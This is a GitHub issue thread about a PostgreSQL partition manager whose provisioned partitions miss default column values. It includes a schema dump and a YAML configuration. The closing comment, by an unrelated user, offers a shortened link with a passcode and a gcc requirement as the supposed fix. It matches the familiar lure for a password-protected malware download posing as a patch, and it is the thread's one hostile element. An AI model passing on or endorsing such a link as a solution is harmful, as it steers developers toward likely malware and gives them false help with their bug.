### ISSUE TITLE
Provisioned partitions miss default values

### ISSUE THREAD

**Issue by ylegat** [qonto/postgresql-partition-manager#39]
### Describe the bug

Provisioned partitions are missing the default values defined on the partitioned table.
Indexes and unique constraints however seems to be correctly created.

### Desktop (please complete the following information)

- OS: Linux
- PostgreSQL partition manager: 1.0.1
- PostgreSQL version: 14
- Partition key column type: uuidv7

If possible, please also share:

- Table table structure dump (`pg_dump --schema-only --no-comments --no-privileges -t <table_name> <database_name>`)
```sql
CREATE TABLE public.test (
    id uuid NOT NULL,
    value text DEFAULT 'empty'::text
)
PARTITION BY RANGE (id);

ALTER TABLE ONLY public.test
    ADD CONSTRAINT c UNIQUE (id, value);

ALTER TABLE ONLY public.test
    ADD CONSTRAINT test_pkey PRIMARY KEY (id);
```

- PostgreSQL Partition Manager configuration (`postgresql-partition-manager.yaml`)
```
# Enable debug mode
debug: true

# Log format (text or json)
log-format: text

# Set maximum allowed duration of any statement (milliseconds unit)
# statement-timeout: 3000

# Sets the maximum allowed duration of any wait for a lock (milliseconds unit)
# This parameter prevent infitite locks when long running transaction occured
# lock-timeout: 300

# PostgreSQL connection URL
connection-url: postgres://postgres:postgres@127:5433
#
partitions:
  test:
    schema: public
    table: test
    partitionKey: id
    interval: yearly
    retention: 5
    preProvisioned: 2
    cleanupPolicy: detach
```

### To Reproduce

Create a partitioned table defining a default value on one of its column, run the partition manager to provision a partition.

### Expected behavior

The partition table created by the manager should be configured with the same default values than the partitioned table.

**Comment by abdulrehman-code** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
